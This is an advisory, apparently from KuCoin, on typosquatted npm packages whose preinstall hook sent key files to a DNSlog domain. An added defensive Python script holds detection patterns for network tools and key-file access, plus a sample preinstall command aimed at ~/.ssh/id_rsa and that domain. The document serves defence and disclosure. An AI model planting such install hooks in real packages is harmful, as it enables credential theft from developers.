Alert | KuCoin Security Team Captures Supply Chain Attack Targeting Exchange Users

2025/02/18 07:45:49

Introduction 

On February 12, 2025, the Kucoin security team's in-house security scanning platform detected a supply chain attack targeting users of major centralized exchanges (CEXs). The team promptly analyzed the malicious behavior embedded in the dependency package. As of this writing, the malicious dependency has been downloaded hundreds of times. Kucoin's security team has reported the malicious dependency to NPM's official team and is issuing this alert to urge users to stay vigilant.

Sample Analysis 

Sample Behavior 

Kucoin's security scanning platform detected a package in the official NPM registry disguised as the Kucoin API SDK. When installed via npm, the package reads secret keys stored on the user's server or local machine and sends them to the malicious domain: http://ihlkoqayjlegsltkrlhf1sg6hpfdbmrgy[.]oast[.]fun

Sample Analysis

Analysis on Kucoin's sandbox scanning platform showed that the malicious dependency masqueraded as SDK packages for both Kucoin and Kraken in the official NPM registry.

These packages use look-alike names to trick users into installing fake dependencies. During installation, an embedded malicious command extracts secret key files from the user's local environment or server and sends the data to a malicious domain via DNSlog (DNS-based out-of-band exfiltration).

The specific trigger point of the malicious behavior is the package's preinstall lifecycle hook: npm runs the malicious command automatically before the package is installed, so the victim never needs to import or call any of the package's code.

All 10 dependency packages published by this malicious source exhibit the same behavior.

Attacker Profile 

The investigation uncovered the following registration details associated with the attacker on the NPM official repository: 

Username: superhotuser1
Email: tafes30513@shouxs[.]com 

According to verifymail.io, the domain shouxs[.]com is associated with temporary email services, indicating that the attacker is an experienced hacker skilled in anti-tracking techniques.

Threat Description 

Supply chain attacks pose significant risks. As they develop, their impact expands, given that many projects rely on numerous third-party packages. Once a malicious package is published and widely used, its effects spread rapidly. Malicious dependencies can steal sensitive user information, such as environment variables, API keys, and user data, leading to data leaks. They can also execute destructive actions like file deletion, data encryption (ransomware), or system disruption. Furthermore, attackers may implant backdoors within the package, allowing long-term control over affected systems and enabling further attacks. 

The malicious dependencies targeting Kucoin and Kraken specifically steal user login keys. If users log into their personal computers or servers using usernames and passwords, there is a significant risk that their servers could be compromised. 

As of the time Kucoin’s security team issued this alert, the malicious dependency had been downloaded hundreds of times. The download statistics are as follows: 

kucoin-production, downloads: 67
kucoin-main, downloads: 70
kucoin-internal, downloads: 63
kucoin-test, downloads: 69
kucoin-dev, downloads: 66 

kraken-dev, downloads: 70
kraken-main, downloads: 65
kraken-production, downloads: 67
kraken-test, downloads: 65
kraken-internal, downloads: 64 

IOC

Type: Domain
Value: http://ihlkoqayjlegsltkrlhf1sg6hpfdbmrgy[.]oast[.]fun
Remarks: Malicious DNSlog subdomain

Type: URL
Value: https://www[.]npmjs[.]com/~superhotuser1
Remarks: Malicious dependency source URL (attacker's npm profile)

Type: Installation Package Hash

Remarks: SHA256 values of the ten malicious dependency package tarballs (kucoin-* and kraken-*, all version 19.4.9)

Mitigation 

Less than one day passed between the attacker uploading the malicious dependency and Kucoin's security team detecting it. Kucoin's security team has already reported the issue to NPM's official team, though investigation and removal may take some time. In the meantime, Kucoin has issued this public warning to alert users and help prevent compromise.
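As an added defensive example (not code from Kucoin or from the advisory), the following Python script implements two checks suggested by the Sample Analysis and IOC sections above: it audits a package.json for install-time lifecycle hooks and flags commands that reference DNSlog-style domains, network tools or key files, and it matches package names from a package-lock.json against the ten IOC package names listed in this alert. The sample inputs are constructed; the regex patterns are an assumption, and the preinstall command in the sample is a non-functional stand-in for the behavior the advisory describes.

```python
import json
import re

# Package names this advisory lists as malicious (all published as version 19.4.9).
IOC_PACKAGES = {
    "kucoin-production", "kucoin-main", "kucoin-internal", "kucoin-test", "kucoin-dev",
    "kraken-dev", "kraken-main", "kraken-production", "kraken-test", "kraken-internal",
}
# Lifecycle hooks npm runs automatically during install; the advisory's trigger point is preinstall.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Assumed heuristics hinting at credential collection or out-of-band (DNSlog) exfiltration.
SUSPICIOUS = {
    "dnslog/oast domain": re.compile(r"oast\.fun|dnslog|interact\.sh", re.I),
    "network tool": re.compile(r"\b(curl|wget|nslookup|dig)\b", re.I),
    "key/secret file access": re.compile(r"\.ssh|\.env\b|id_rsa|api[_-]?key|secret", re.I),
}

def audit_package_json(text):
    """Return findings for one package.json: IOC name match and risky lifecycle scripts."""
    pkg = json.loads(text)
    findings = []
    if pkg.get("name") in IOC_PACKAGES:
        findings.append(f"name '{pkg['name']}' is on the advisory IOC list")
    for hook in LIFECYCLE_HOOKS:
        cmd = pkg.get("scripts", {}).get(hook)
        if not cmd:
            continue
        hits = [label for label, rx in SUSPICIOUS.items() if rx.search(cmd)]
        findings.append(f"{hook} hook present" + (f" ({', '.join(hits)})" if hits else ""))
    return findings

def find_ioc_in_lockfile(text):
    """Return IOC package names installed according to a package-lock.json (v2/v3 'packages' map)."""
    lock = json.loads(text)
    names = {p.rsplit("node_modules/", 1)[-1] for p in lock.get("packages", {}) if p}
    return sorted(names & IOC_PACKAGES)

# Constructed samples (not the real package contents): the preinstall command is a
# non-functional stand-in for the key-file collection and DNSlog beacon the advisory describes.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "kucoin-main", "version": "19.4.9",
    "scripts": {"preinstall": "node collect.js ~/.ssh/id_rsa ihlkoqayjlegsltkrlhf1sg6hpfdbmrgy.oast.fun"},
})
SAMPLE_LOCK = json.dumps({"lockfileVersion": 3, "packages": {
    "": {"name": "my-app"},
    "node_modules/kraken-dev": {"version": "19.4.9"},
    "node_modules/lodash": {"version": "4.17.21"},
}})
```

Running `npm install --ignore-scripts` (or setting `ignore-scripts=true` in .npmrc) stops preinstall hooks like this from executing at all, at the cost of breaking packages that legitimately build native code in their install scripts.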